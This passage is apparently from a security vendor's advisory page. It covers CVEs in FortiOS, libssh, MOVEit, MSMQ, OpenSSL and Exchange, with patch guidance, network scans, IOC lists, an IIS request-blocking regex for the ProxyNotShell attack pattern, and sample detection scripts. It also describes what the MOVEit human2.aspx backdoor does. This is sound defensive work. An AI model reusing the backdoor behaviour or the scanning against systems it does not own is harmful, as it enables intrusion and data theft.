    This vulnerability is very serious, as it can compromise the security and integrity of the network protected by Fortigate devices. SSL VPNs are used to provide secure remote access to an organization’s network, but this flaw can potentially breach this secure channel and allow attackers to execute arbitrary code or commands on the device.

    The vulnerability is also reachable pre-authentication, meaning that attackers do not need any credentials or privileges to exploit it. This increases the risk of exploitation by malicious actors who may target vulnerable devices exposed on the internet.

    Public exploitation of CVE-2023-27997 has not been reported in the wild as of yet, and no known public exploit code for this vulnerability has been released.

    What Should I Do?

    Fortinet has issued patches for this vulnerability, which are included in versions 7.2.5, 7.0.12, 6.4.13, 6.2.15, and 6.0.17 of FortiOS firmware. Users are strongly advised to update their systems to these versions as soon as possible to prevent potential attacks.

    Users should also review their network configurations and firewall rules to ensure that only authorized and trusted users can access the SSL VPN functionalities of Fortigate devices.

    How To Detect

    Fortigate users can check if their devices are vulnerable by using the following command on the CLI:

    diagnose sys fortiguard-service status

    If the output shows FortiOS Version: 7.2.5 or higher, 7.0.12 or higher, 6.4.13 or higher, 6.2.15 or higher, or 6.0.17 or higher, then the device is not vulnerable. If the output shows a lower version number, the device is vulnerable and must be patched.
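    The version logic in the paragraph above is branch-specific: a device is fixed only if it is at or above the fixed release of its own branch, so 7.0.11 is vulnerable even though it is "higher" than 6.4.13. The following is an added example that encodes the five fixed versions listed in the advisory; it is not a Fortinet tool, the CLI output it parses is constructed for illustration, and versions on branches the advisory does not list (for example 7.4.x) are reported as undetermined rather than guessed.

```python
import re

# Fixed FortiOS releases per branch, exactly as listed in the advisory above.
FIXED_BY_BRANCH = {
    (7, 2): (7, 2, 5),
    (7, 0): (7, 0, 12),
    (6, 4): (6, 4, 13),
    (6, 2): (6, 2, 15),
    (6, 0): (6, 0, 17),
}

# Matches "7.0.11" or "v7.0.11" anywhere in a line.
VERSION_RE = re.compile(r"\b[vV]?(\d+)\.(\d+)\.(\d+)\b")


def parse_version(text):
    """Return (major, minor, patch) from the first dotted version in text, or None."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    return tuple(int(x) for x in m.groups())


def is_vulnerable(version):
    """True if below the fix for its branch, False if fixed, None if the branch is not covered.

    Accepts either a version string ("7.0.11") or a tuple (7, 0, 11).
    """
    v = parse_version(version) if isinstance(version, str) else tuple(version)
    if v is None:
        return None
    fixed = FIXED_BY_BRANCH.get(v[:2])
    if fixed is None:
        return None  # branch not listed in the advisory: check Fortinet's PSIRT entry
    return v < fixed


def check_cli_output(output):
    """Find the first line mentioning a version and classify it.

    Returns (version_string, vulnerable) or (None, None) if no version is found.
    """
    for line in output.splitlines():
        if "version" in line.lower():
            v = parse_version(line)
            if v:
                return ".".join(map(str, v)), is_vulnerable(v)
    return None, None


# Constructed sample of what a version line in CLI output might look like;
# the exact layout on a real device may differ.
SAMPLE_OUTPUT = "Locale: en\nLicense: Contract\nVersion: v7.2.4 build1396\n"

if __name__ == "__main__":
    version, vulnerable = check_cli_output(SAMPLE_OUTPUT)
    print(version, "vulnerable" if vulnerable else "fixed/undetermined")
```

    A `None` result deserves a manual look rather than being treated as "safe": it means the branch is outside the list the advisory gives, not that the device is patched.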

    Users can also use external tools such as Blumira's FREE Domain Assessment or Nmap to scan their devices for open ports related to SSL VPN (such as 443 or 10443) and check the banner information for the FortiOS version number.

    How Blumira Can Help

    It’s nearly impossible for admins to track every vulnerability, but Blumira’s security experts perform threat hunting on your behalf and develop detections in real time to protect your environment.

    Blumira is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Critical
    June 8, 2023

    LibSSH Authentication Bypass Vulnerability (CVE-2023-2283)

    A significant vulnerability has been identified in the libssh library, specifically within the pki_verify_data_signature function, which is used to verify connecting clients’ identities. The function could allow unauthorized access under certain conditions, such as limited or insufficient memory. 

    What Happened?

    A significant vulnerability has been identified in the libssh library, specifically within the pki_verify_data_signature function, which is used to verify connecting clients’ identities. The function could allow unauthorized access under certain conditions, such as limited or insufficient memory. This issue has been identified as CVE-2023-2283. It is important to note that public proof of concept exploits have been made available, increasing the likelihood of potential attacks.

    How Bad is This?

    The severity of this vulnerability is considered moderate, but the public availability of exploit code significantly increases its potential impact. LibSSH is utilized by most Linux-based SSH server software, and so this impacts most major Linux distributions and likely many IoT devices as well.


    An SSH vulnerability is particularly risky because an authentication bypass lets an attacker right in through the front door. They don’t need to know a password to access the system and would typically have administrator-level access. A successful exploit could lead to unauthorized access and potential misuse of sensitive data or systems.

    Libssh vs OpenSSH

    One important note for clarity: libssh is not the same thing as openssh.

    OpenSSH is a suite of secure networking utilities based on the Secure Shell (SSH) protocol, which provides secure remote login capabilities and other secure network services over an insecure network. OpenSSH is developed as part of the OpenBSD project and is included in many Unix-like operating systems. OpenSSH is widely used.

    On the other hand, libssh is a multiplatform C library that implements the SSHv2 and SSHv1 protocol on client and server side. It’s designed to be easy to use for developers and allows applications to provide all sorts of SSH-based functionality. libssh is not related to OpenSSH, and any vulnerabilities found in one do not necessarily apply to the other. LibSSH is less widely used.

    Credit: Shodan.io

    Per the security search engine Shodan, there are 803 exposed libssh hosts at the time of this writing; however, this number is likely much higher internally within large enterprise networks.

    What Should I Do?

    Immediate action is recommended to mitigate this vulnerability. The libssh team has already issued patches for this vulnerability, and it is advised that you update your libssh software to the latest version.

    For Ubuntu systems, the following specific updates are available:

    • Ubuntu 23.04: libssh-4 – 0.10.4-2ubuntu0.1
    • Ubuntu 22.10: libssh-4 – 0.9.6-2ubuntu0.22.10.1
    • Ubuntu 22.04: libssh-4 – 0.9.6-2ubuntu0.22.04.1
    • Ubuntu 20.04: libssh-4 – 0.9.3-2ubuntu2.3

    For other Linux distributions, please check your provider’s latest security bulletins for patch availability.

    How To Detect

    To detect potential exploitation of this vulnerability, monitor your systems for unexpected access events, particularly any that could be related to the pki_verify_data_signature function. Further details on detection techniques and strategies may be found in the referenced articles or through your security monitoring solution’s documentation.

    To identify potential hosts running libssh in your network, you can use a network scanning tool like Nmap or our Free Domain Assessment. The following command conducts a version detection scan for SSH on all hosts within the subnet 192.168.1.0/24, and then singles out lines specifying “libssh”:

    nmap -sV -p 22 192.168.1.0/24 | grep "libssh"

    This approach has limitations, though. It’s predicated on the servers sharing a banner that explicitly names libssh. Not all servers provide such specific banners, and sometimes these banners can be misleading or incorrect. This means that despite using this command, further investigation or a manual review might still be necessary for some hosts. In case of any uncertainties, it’s recommended to verify the version of libssh installed on the system.

    However, our recommendation is to prioritize patching what you know you have first, then scan for anything you may not already know of.


    How Does Blumira Protect Against This?

    Blumira’s security platform includes a specific detection for SSH Connections from Public IP addresses. This detection capability is designed to identify potential scanning and attempted exploitation activities related to this vulnerability.

    By continuously monitoring your network traffic, Blumira can alert your IT team to suspicious SSH connections, offering an extra layer of protection against this specific libssh vulnerability. It’s another proactive measure to ensure your systems remain secure.

    How Blumira Can Help

    It’s nearly impossible for admins to track every vulnerability, but Blumira’s security experts perform threat hunting on your behalf and develop detections in real time to protect your environment.

    Blumira’s Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Critical
    June 1, 2023

    Zero-Day Vulnerability Found In MOVEit Transfer

    Update 6/5/2023 @ 10 AM ET:

    Microsoft Points to Clop Ransomware Gang in MOVEit Data-Theft Attacks

    Microsoft has discovered a link between a well-known cybercriminal group called Clop and a recent series of attacks on the MOVEit Transfer platform. The attacks made use of a security flaw (called a ‘zero-day vulnerability’) to steal data from organizations. According to Microsoft’s Threat Intelligence team, this group has exploited similar flaws in the past.

    Quick Recap: What Happened with MOVEit Transfer?

    News outlet BleepingComputer first reported that unidentified hackers were using a zero-day vulnerability in MOVEit Transfer servers to steal data. MOVEit Transfer is a system used by businesses to move files between each other and their customers.

    The attacks started around May 27th, during the US Memorial Day holiday weekend. The hackers exploited this vulnerability to put a special program (called a webshell) onto servers. This allowed them to list and download files, and also to steal sensitive information from Azure Blob Storage containers, which are used to store data in the cloud.

    Clop Ransomware Group Likely Involved

    While it wasn’t immediately clear who was behind the attacks, similarities with previous attacks led to suspicions about the Clop group. This group is known for targeting this kind of software, and has launched similar attacks in the past.

    Microsoft’s threat intelligence team is now saying that these attacks are linked to ‘Lace Tempest’. This is a new name they are using to refer to this group, which is also known as TA505, FIN11, or DEV-0950.

    Waiting for Extortion Attempts

    As of now, the Clop group has not started asking for money in return for the stolen data.

    However, they have done this in the past. It’s worth noting that the Clop gang is known for its ‘wait-and-see’ approach, usually waiting a few weeks after the data theft before they start making demands.

    “If you ignore us, we will sell your information on the black market and publish it on our blog, which receives 30-50 thousand unique visitors per day. You can read about us on Google by searching for CLOP hacker group,” reads a typical Clop ransom note.

    Once they start making these demands, Clop often adds more victims to their website where they threaten to publish stolen files. This is done to put more pressure on their victims. Based on the timeline of the GoAnywhere attacks, it took just over a month before victims started appearing on the gang’s website.

    What Happened?

    Progress Software Corporation published an advisory on May 31, 2023 stating that it had discovered a zero-day vulnerability in MOVEit Transfer, a managed file transfer solution developed by the company’s subsidiary, Ipswitch.

    No CVSS score has been issued yet, but based on the ports blocked and the location that admins should check for unusual files, it is likely a web-facing SQL injection (SQLi) vulnerability, reported BleepingComputer.

    Attackers could leverage the vulnerability (CVE-2023-34362) to escalate privileges and gain unauthorized access into the environment, according to TrustedSec. If successful, an unauthenticated threat actor could gain remote access to any folder or file within a MOVEit system.

    On May 28, 2023 at 1:18 PM EST, Blumira detected a zero-day exploitation of the MOVEit file transfer utility. We did this by detecting the webshell human2.aspx as it was written by the IIS process w3wp.exe, which is typical post-exploitation activity.

    This vulnerability is actively being exploited in the wild.

    How Bad is This?

    This is bad: not only are threat actors using this vulnerability to exploit MOVEit, but they have systematized the exfiltration of private data from organizations that use MOVEit.

    According to the public analysis performed on the actual sample backdoor, in simple terms, here’s how it works:

    • The backdoor (human2.aspx) looks for a special password. If the password is not correct, it’ll simply show an error message.
    • Then, it looks for specific instructions. This instruction can be -1, -2, or it might not exist at all. Depending on this, it does different things:
      • If the instruction is -1, it does a couple of things. Firstly, it collects some special IDs related to a service called Azure Blob Storage.
      • Secondly, it gets a list of all files and folders, their owners, their sizes, and the names of all institutions in a system called MOVEit, and sends this information back.
      • If the instruction is -2, it deletes a user named “Health Check Service” from the list of users.
      • If there is no instruction, it does something different. It looks for two additional instructions, one representing a folder and the other a file. If it finds these instructions, it will provide the requested file (i.e., it exfiltrates data). If these instructions are missing, it adds a new user named “Health Check Service” as an admin and creates a new active session for this user.

    What Should I Do?

    Progress released a patch, which can be found in the advisory. Admins should apply it as soon as possible.

    In the meantime, Progress recommends that organizations immediately modify firewall rules to deny HTTP and HTTPS traffic to their MOVEit Transfer environment on ports 80 and 443. This will temporarily disable some components, including:

    • The MOVEit Transfer web UI
    • Automation tasks that use the native MOVEit Transfer host
    • REST, Java and .NET APIs
    • MOVEit Transfer add-in for Outlook

    Upgrade to a fixed version of MOVEit Transfer:

    • MOVEit Transfer 2023.0.1
    • MOVEit Transfer 2022.1.5
    • MOVEit Transfer 2022.0.4
    • MOVEit Transfer 2021.1.4
    • MOVEit Transfer 2021.0.6

    How To Detect

    You can detect active exploitation by utilizing the Yara rule crafted and published in SigmaHQ.

    The Yara detection rule involves checking for files in the ‘\MOVEit Transfer\wwwroot’ directory that have extensions such as ‘.7z’, ‘.bat’, ‘.dll’, ‘.exe’, ‘.ps1’, ‘.rar’, ‘.vbe’, ‘.vbs’, ‘.zip’, and specifically for a file named ‘human2.aspx’ in the same directory.


    How Does Blumira Protect Against This?

    The existing Blumira detection, “Webshells by File Write” will detect exploitation of this vulnerability. Be on the lookout for files written by the IIS process to the C:\MOVEitTransfer\wwwroot\ directory. Any web-facing servers that trigger this detection and are hosting the MOVEit Transfer service should be heavily scrutinized.
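    The two detection ideas in this section, the on-disk check the Yara rule performs (unexpected file types or human2.aspx under the wwwroot directory) and the behavioural check Blumira's "Webshells by File Write" makes (the IIS worker process w3wp.exe writing into wwwroot), can both be expressed in a few lines. The following is an added example and is neither the SigmaHQ rule nor Blumira's detection; the file paths and file-creation events it runs on are constructed, the event field names (Image, TargetFilename) are assumed to follow a Sysmon-style file-create record, and both directory spellings that appear above are accepted.

```python
import ntpath  # Windows path semantics even when this runs on Linux

# Both directory spellings used in the section above, matched case-insensitively.
WWWROOT_MARKERS = ("\\moveit transfer\\wwwroot\\", "\\moveittransfer\\wwwroot\\")

# File extensions the Yara rule looks for under wwwroot, plus the known webshell name.
SUSPICIOUS_EXTS = {".7z", ".bat", ".dll", ".exe", ".ps1", ".rar", ".vbe", ".vbs", ".zip"}
KNOWN_WEBSHELL = "human2.aspx"


def in_wwwroot(path):
    """True if the path lies under a MOVEit Transfer wwwroot directory."""
    p = path.lower()
    return any(marker in p for marker in WWWROOT_MARKERS)


def suspicious_wwwroot_files(paths):
    """Disk-oriented check: return paths under wwwroot that the Yara logic would flag."""
    hits = []
    for path in paths:
        if not in_wwwroot(path):
            continue
        name = ntpath.basename(path).lower()
        ext = ntpath.splitext(name)[1]
        if name == KNOWN_WEBSHELL or ext in SUSPICIOUS_EXTS:
            hits.append(path)
    return hits


def is_webshell_write(event):
    """Behavioural check: did the IIS worker process create a file under wwwroot?

    A legitimate installer or administrator writing there is expected; the web
    server process itself writing into its own content root is not.
    """
    image = ntpath.basename(event.get("Image", "")).lower()
    target = event.get("TargetFilename", "")
    return image == "w3wp.exe" and in_wwwroot(target)


def flag_events(events):
    """Return the subset of file-create events that match the webshell-write pattern."""
    return [e for e in events if is_webshell_write(e)]


# Constructed sample data (illustrative only).
SAMPLE_PATHS = [
    r"C:\MOVEitTransfer\wwwroot\human2.aspx",
    r"C:\MOVEitTransfer\wwwroot\images\logo.png",
    r"C:\MOVEit Transfer\wwwroot\update.ps1",
    r"C:\Windows\Temp\installer.exe",
]

SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "TargetFilename": r"C:\MOVEitTransfer\wwwroot\human2.aspx"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "TargetFilename": r"C:\MOVEitTransfer\wwwroot\web.config"},
    {"Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "TargetFilename": r"C:\inetpub\temp\session.tmp"},
]

if __name__ == "__main__":
    print("suspicious files:", suspicious_wwwroot_files(SAMPLE_PATHS))
    print("webshell writes:", flag_events(SAMPLE_EVENTS))
```

    The second check is the more general of the two: it does not depend on the attacker reusing the human2.aspx name or any particular extension, which is why a file-write detection keyed on the writing process catches variants that a name-based rule would miss.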

    Update 6/28/2023 @ 4 pm ET:

    Blumira has created the following additional detections for this malicious activity; they look for known bad user-agent strings, files, and other MOVEit API calls:

    • CVE-2023-34362: MoveIT Indicator of Compromise Suspicious User Agent
    • CVE-2023-34362: MoveIT Indicator of Compromise

    How Blumira Can Help

    It’s nearly impossible for admins to track every vulnerability, but Blumira’s security experts perform threat hunting on your behalf and develop detections in real time to protect your environment.

    Blumira’s Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Critical
    April 20, 2023

    QueueJumper: (CVE-2023-21554) Enables Remote MSMQ Exec

    Wayne Low of Fortinet’s FortiGuard Lab and Haifei Li of Check Point Research discovered a series of vulnerabilities in Windows Message Queuing (MSMQ), the most serious being CVE-2023-21554, dubbed QueueJumper.

    What Happened?

    Wayne Low of Fortinet’s FortiGuard Lab and Haifei Li of Check Point Research discovered a series of vulnerabilities in Windows Message Queuing (MSMQ), the most serious being CVE-2023-21554, dubbed QueueJumper. If MSMQ is enabled on a server, an attacker can use TCP port 1801 to execute code remotely and without authorization — effectively taking over the server.

    The vulnerability was first reported to Microsoft, and a patch was released for this month’s Patch Tuesday on April 11.

    What is Windows Message Queuing (MSMQ)?

    MSMQ is a middleware service that allows applications running at different times to communicate across networks that may be temporarily offline.

    MSMQ isn’t enabled by default on most systems and is considered a legacy service, but it’s commonly toggled on when installing apps and will remain running in the background — making it difficult for users and admins to know whether it is being used. The setup wizard app for Microsoft Exchange Server, for example, enables the MSMQ service in the background if the user follows Microsoft’s recommended prompts, according to Check Point Research.


    How Bad is This?

    The vulnerability has a 9.8 out of 10 rating on the CVSS severity scale. The rating also categorizes attack complexity as low and privileges required as none, which means that this vulnerability is low-hanging fruit for an attacker. If an attacker sends a malicious MSMQ packet to a server running the MSMQ service, it could result in remote code execution on the server side, said Microsoft.

    A remote code execution (RCE) vulnerability is always severe because it enables potential threat actors to execute arbitrary code or commands on a remote system. This typically results in an attacker taking control of the remote system and launching further attacks.

    Additionally, MSMQ usage is relatively widespread. According to Check Point Research, over 360,000 IPs have the TCP port 1801 open to the internet and are running the MSMQ service, meaning that they are susceptible to attack.

    This doesn’t even account for computers that host the MSMQ service on internal networks; however, the most “at-risk” servers or endpoints running the MSMQ service are the ones that are exposed to the internet (like a web server). Internal servers that are not publicly exposed are at a much lower risk, since someone would need to already be inside the network to exploit them.

    What Should I Do?

    Affected Windows server and client versions include all currently supported releases up to the latest versions, Windows 11 22H2 and Windows Server 2022.

    If you run these versions within your environment, check if there is a service running named ‘Message Queuing’, and TCP port 1801 is listening on the computer.

    Then, apply the patch that is available here.

    If you can’t patch and can’t disable the service, block TCP port 1801 from untrusted sources. This can be done on the computer itself using the built-in Windows Firewall or at your network perimeter with a physical or virtual firewall appliance.

    How Blumira Can Help

    It’s nearly impossible for admins to track every vulnerability, but Blumira’s security experts perform threat hunting on your behalf and develop detections in real time to protect your environment. Blumira is actively working on a detection for QueueJumper for its customers.

    Blumira released two detections and one global report to assist with proactive searching for mqsvc in customer environments:

    • Detection 1: CVE-2023-21554 QueueJumper – Accepted External Connection to mqsvc.exe
    • Detection 2: CVE-2023-21554 QueueJumper – Suspicious Child Process of mqsvc.exe
    • Global Report: Windows – Hosts with Listening mqsvc.exe

    Blumira’s Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Sign up for free and connect to your Microsoft 365 environment in minutes to start detecting and mitigating exposure related to Windows vulnerabilities.

    Critical
    December 13, 2022

    Fortinet SSL-VPN RCE Vulnerability (CVE-2022-40684) Exploited In The Wild

    French cybersecurity firm Olympe Cyberdefense discovered and disclosed a zero-day vulnerability in Fortinet (CVE-2022-40684) that enables unauthenticated remote code execution (RCE) on devices.

    What Happened

    French cybersecurity firm Olympe Cyberdefense discovered and disclosed a zero-day vulnerability in Fortinet (CVE-2022-40684) that enables unauthenticated remote code execution (RCE) on devices.

    This security flaw affects devices running FortiOS SSL-VPN, according to Fortinet:

    • FortiOS version 7.2.0 through 7.2.1
    • FortiOS version 7.0.0 through 7.0.6
    • FortiProxy version 7.2.0
    • FortiProxy version 7.0.0 through 7.0.6
    • FortiSwitchManager version 7.2.0
    • FortiSwitchManager version 7.0.0

    The bug is an authentication bypass vulnerability, which means that unauthenticated attackers are allowed to perform certain administrative tasks by means of specially-crafted HTTP or HTTPS requests. The most common administrative tasks performed by attackers are exfiltrating Fortinet device configurations and creating super admin accounts on the compromised device.

    Fortinet quietly fixed the bug on November 28 with the release of FortiOS 7.2.3. On December 12, Fortinet released security advisory FG-IR-22-398, warning that the vulnerability has been actively exploited in attacks. The advisory recommended that customers immediately validate their systems against indicators of compromise.

    How Bad is This?

    The vulnerability has a 9.8 score from National Vulnerability Database (NVD) and the CVE Numbering Authority (CNA), making it critical — the highest severity a vulnerability can receive.

    An RCE is one of the most dangerous types of flaws because it allows an adversary to execute malicious code on vulnerable servers.

    What Should I Do?

    First, understand the scope and attack surface of your devices. Identify devices that are not updated to the fixed system versions.

    Any device that was running a vulnerable version, and exposed to the Internet should be examined for signs of compromise. If an attacker leveraged this vulnerability to compromise your firewall, applying the patch is unlikely to remove the attacker’s ongoing access.

    The best, and possibly only, way to detect if the firewall has been compromised is with the below indicators of compromise. If you are unsure if your firewall has been compromised, or if you have identified signs of compromise, engage with an incident response professional to determine next steps.

    You’ll likely need to take the suspect firewall offline for the investigation process to happen. This will cause a service outage, but this step ensures that security is restored to your network.

    If you carry cyber liability or similar types of insurance, you should immediately reach out to your insurer, as they may have resources to provide in the event of a suspected incident.

    How To Detect

    Once all affected devices have been identified, review their logs for indicators of compromise. If your logs are being stored in a SIEM or other separate log analysis system, you should be able to examine the logs in that way. Fortinet has shared the following indicators of compromise:

    • Any log entry associated with the user “Local_Process_Access”
    • Log entries with the message “System config file has been downloaded by user Local_Process_Access via {source}”
      • Source has been seen as “Report Runner” or “Node.js” (Source: Trusec)
    • Logs showing the IOC will be located under the “System Events” subtype (Source: Trusec)
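    The indicators above are easy to check programmatically once the logs are in a SIEM or exported from the device. The following is an added example, not Fortinet's or Blumira's detection; it parses FortiGate-style key=value log lines and flags exactly the two indicators listed (the Local_Process_Access user and the config-download message, capturing the "via" source). The log lines are constructed for illustration and the field layout is an assumption modelled on FortiGate event logs.

```python
import re

# key=value pairs; values are either a double-quoted string (may contain spaces) or a bare token.
KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')

# Second indicator from the list above, with the {source} part captured.
CONFIG_DL_RE = re.compile(
    r"System config file has been downloaded by user Local_Process_Access via (.+)"
)


def parse_fortigate_line(line):
    """Turn one key=value log line into a dict, stripping quotes from quoted values."""
    fields = {}
    for key, raw in KV_RE.findall(line):
        fields[key] = raw[1:-1] if raw.startswith('"') and raw.endswith('"') else raw
    return fields


def match_ioc(fields):
    """Return the list of indicators a parsed log record matches (empty if none)."""
    reasons = []
    if fields.get("user") == "Local_Process_Access":
        reasons.append("user=Local_Process_Access")
    m = CONFIG_DL_RE.search(fields.get("msg", ""))
    if m:
        reasons.append(f"config download via {m.group(1).strip()}")
    return reasons


def scan_logs(text):
    """Scan a block of log lines and return one finding per matching record."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = parse_fortigate_line(line)
        reasons = match_ioc(fields)
        if reasons:
            findings.append({
                "time": f"{fields.get('date', '?')} {fields.get('time', '?')}",
                "subtype": fields.get("subtype"),
                "reasons": reasons,
            })
    return findings


# Constructed sample log lines (illustrative; not captured from a real device).
SAMPLE_LOGS = """\
date=2022-12-01 time=09:12:44 type="event" subtype="system" level="information" logdesc="Config file downloaded" user="Local_Process_Access" ui="Report Runner" msg="System config file has been downloaded by user Local_Process_Access via Report Runner"
date=2022-12-01 time=09:13:02 type="event" subtype="system" level="information" logdesc="Admin login successful" user="admin" ui="https(198.51.100.20)" msg="Administrator admin logged in successfully from https(198.51.100.20)"
date=2022-12-01 time=09:15:10 type="event" subtype="system" level="information" logdesc="Config file downloaded" user="Local_Process_Access" ui="Node.js" msg="System config file has been downloaded by user Local_Process_Access via Node.js"
"""

if __name__ == "__main__":
    for finding in scan_logs(SAMPLE_LOGS):
        print(finding)
```

    Both matching records carry subtype "system", which lines up with the advice above to look under the “System Events” subtype; the benign admin login in between is not flagged.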

    How Blumira Can Help

    Blumira’s incident detection engineering (IDE) team has created a detection in response to this vulnerability, called “Fortigate: Authentication Bypass CVE-2022-40684.” This enables customers to detect instances of CVE-2022-40684 being exploited in their environment.

    Blumira’s cloud SIEM detects and alerts you about suspicious behavior in your environment so that you can stop an incident early enough to prevent damage. Each finding we send is accompanied with a security playbook, giving you clear recommendations on how to remediate an attack. Our support team of security analysts is always available to answer questions on how to interpret a finding, or for other security help.



    Chris Furner, Senior Sales Engineer, contributed to this report.

    Critical
    November 1, 2022

    OpenSSL Vulnerability: What You Should Know

    A high-severity vulnerability (CVE-2022-3786, CVE-2022-3602) was discovered in OpenSSL, a popular open source cryptography library that many applications, operating systems and websites use to secure communications via Secure Sockets Layer (SSL) and Transport Layer Security (TLS).

    What Happened?

    A high-severity vulnerability (CVE-2022-3786, CVE-2022-3602) was discovered in OpenSSL, a popular open source cryptography library that many applications, operating systems and websites use to secure communications via Secure Sockets Layer (SSL) and Transport Layer Security (TLS).

    OpenSSL version 3.0.0 is affected. Version 3.0.7, which is now available (it was scheduled for release between 13:00-17:00 UTC, 9 am – 1 pm ET), fixes the issue, according to the OpenSSL team. The vulnerability primarily affects clients rather than servers.

    Update 11/1 @ 1:30 PM ET: The vulnerability rating was downgraded to high.

    How Bad is This?

    Technical details are not yet released, but the OpenSSL project provides some information on what it considers high:

    “This includes issues that are of a lower risk than critical, perhaps due to affecting less common configurations, or which are less likely to be exploitable. These issues will be kept private and will trigger a new release of all supported versions. We will attempt to keep the time these issues are private to a minimum; our aim would be no longer than a month where this is something under our control.”

    This is not the first OpenSSL vulnerability; in 2014, Heartbleed (CVE-2014-0160) affected thousands of web servers, enabling attackers to access the parts of OpenSSL’s memory that should be private — which could include SSL private keys.

    It is currently not yet clear whether this vulnerability will have the impact that Heartbleed did, but some experts are speculating that it will be similar or worse.

    What Should I Do?

    Prioritize patching now that OpenSSL version 3.0.7 is available (it was scheduled for release between 13:00-17:00 UTC, 9 am – 1 pm ET). The OpenSSL Git repository should have the latest version at https://github.com/openssl/openssl or https://www.openssl.org/source/.

    Users wondering what to patch first should follow this prioritization list below:

    1. External-facing machines that can be reached via the internet.
    2. Systems that host shared services amongst multiple users.
    3. All other affected hosts.

    How To Detect

    OpenSSL provides a command line utility; a quick query returns the version of the SSL library running on a device:

    % openssl version

    OpenSSL 3.0.5 5 Jul 2022 (Library: OpenSSL 3.0.5 5 Jul 2022)

    The example shows a vulnerable version of OpenSSL. This device will require an update to 3.0.7.

    Other scanning resources include https://www.ssllabs.com/ssltest/ for web scanning and https://github.com/rbsec/sslscan for command line scanning.

    You can also check this list to see whether a vendor is vulnerable or not.

    Alternatively, you can check your vulnerability scanner results and/or next-generation endpoint protection tools such as SentinelOne, Crowdstrike, etc. for affected devices on your network that have the endpoint agent installed.

    For all other non-standard installations of OpenSSL, keep an eye out for software vendors to provide details on updating their application software that runs on OpenSSL.

    Sign Up For Your Blumira Trial

    Blumira’s cloud SIEM detects and alerts you about suspicious behavior in your environment so that you can stop an incident early enough to prevent damage. Each finding we send is accompanied with a security playbook, giving you clear recommendations on how to remediate an attack. Our support team of security analysts is always available to answer questions on how to interpret a finding, or for other security help.

    Blumira’s trial is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Critical
    September 30, 2022

    Microsoft Exchange Zero-Days: CVE-2022-41040 and CVE-2022-41082 (ProxyNotShell)

    Two zero-day vulnerabilities were discovered in Microsoft Exchange Server 2013, 2016, and 2019. One vulnerability, CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability; the other, CVE-2022-41082, is a remote-code execution (RCE) vulnerability when the attacker can access PowerShell.


    What Happened?

    Two zero-day vulnerabilities were discovered in Microsoft Exchange Server 2013, 2016, and 2019. One vulnerability, CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability; the other, CVE-2022-41082, is a remote-code execution (RCE) vulnerability when the attacker can access PowerShell.

    🚨 There are reports emerging that a new zero day exists in Microsoft Exchange, and is being actively exploited in the wild 🚨

    I can confirm significant numbers of Exchange servers have been backdoored – including a honeypot.

    Thread to track issue follows:

    — Kevin Beaumont (@GossiTheDog) September 29, 2022


    Once Exchange is exploited, these vulnerabilities are nearly indistinguishable from many ProxyShell attacks in their log and behavior pattern.

    ProxyShell is a series of critical vulnerabilities discovered in 2021 that affect on-premises Microsoft Exchange servers. ProxyShell vulnerabilities are especially critical not only because they allow RCE, but because they are relatively easy to execute. The report of an RCE vulnerability within PowerShell Remote is additionally concerning; however, exposure should be limited to internal authenticated users as long as there are no exposed 5985 or 5986 ports to the internet.

    It appears these new Exchange vulnerabilities were found and weaponized by a specific new group that built new attack methods. However, the attack is no different from ProxyShell in the end, as we’ve seen: a threat actor spawns cmd via ProxyShell (e.g., spawned via w3wp.exe) and then uses an environment’s living-off-the-land binaries to execute the attack.

    How Bad is This?

    At the time of this writing, neither CVE has a severity rating in NIST's National Vulnerability Database or MITRE's CVE list.

    However, an RCE is one of the most dangerous types of flaws because it allows an adversary to execute malicious code on vulnerable servers. While Microsoft has confirmed the two new vulnerabilities, it has further clarified that authenticated access to the vulnerable Exchange server is required to exploit either of them.

    What Should I Do?

    According to Microsoft, Exchange Online customers do not need to take any action. However, customers running Microsoft Exchange on-premises should apply Microsoft’s URL Rewrite Instructions and block any exposed Remote PowerShell ports.

    The following mitigation details were provided by Microsoft and derived with support from the original reporter of this vulnerability.

    The current mitigation is to add a blocking rule in “IIS Manager > Default Web Site > Autodiscover > URL Rewrite > Actions” to block the known attack patterns.

    Microsoft has confirmed that the following URL Rewrite Instructions, which are currently being discussed publicly, are successful in breaking current attack chains.

    • Open the IIS Manager.
    • Expand the Default Web Site.
    • Select Autodiscover.
    • In the Feature View, click URL Rewrite.
    • In the Actions pane on the right-hand side, click Add Rules.
    • Select Request Blocking and click OK.
    • Add the string .*autodiscover\.json.*\@.*Powershell.* (without quotes) and click OK.
    • Expand the rule, select the rule with the pattern .*autodiscover\.json.*\@.*Powershell.*, and click Edit under Conditions.
    • Change the condition input from {URL} to {REQUEST_URI}.

    Impact: There is no known impact to Exchange functionality if the URL Rewrite module is installed as recommended.

    Authenticated attackers who can access PowerShell Remoting on vulnerable Exchange systems will be able to trigger RCE using CVE-2022-41082. Blocking the ports used for Remote PowerShell can limit these attacks.

    • HTTP: 5985
    • HTTPS: 5986

    Microsoft has prioritized getting a fix released for these vulnerabilities, so be prepared to start patching once that becomes available.

    Update: 10/3/2022 @ 1:30 PM ET

    • Microsoft has removed the recommendation to block the PowerShell remoting ports (HTTP 5985 and HTTPS 5986). Do not consider blocking them a mitigation for CVE-2022-41082.
    • If your Exchange server is eligible for and running the Exchange Emergency Mitigation Service (EEMS), Microsoft has pushed an automatic mitigation to block the attack. You can confirm whether it has been applied by checking the URL Rewrite rules on your Exchange server: open Administrative Tools and browse to IIS Manager > Sites > Default Web Site > URL Rewrite. The rule can be identified by the EEMS label in its name.
      [Screenshot of the EEMS rule, courtesy of doublepulsar.com]
